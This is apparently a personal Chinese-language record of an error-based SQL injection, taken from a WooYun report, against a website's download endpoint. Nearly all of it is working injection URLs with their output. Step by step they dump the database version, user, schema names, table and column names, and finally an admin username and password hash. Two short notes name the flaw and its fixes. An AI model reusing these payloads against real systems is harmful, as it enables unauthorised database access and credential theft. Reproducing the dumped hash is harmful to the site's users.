http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试,没想到这有,可以测试下,做个记录而已。
(注:以下记录的是报错注入(error-based SQL injection):id 参数被直接拼进 SQL 语句,查询结果通过数据库报错信息回显到页面。修复方向是对该参数使用参数化查询,并关闭对外的数据库错误回显。)
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
(注:32 位十六进制,形似 MD5 摘要,是否加盐从这里看不出;口令应使用带盐的慢哈希存储。)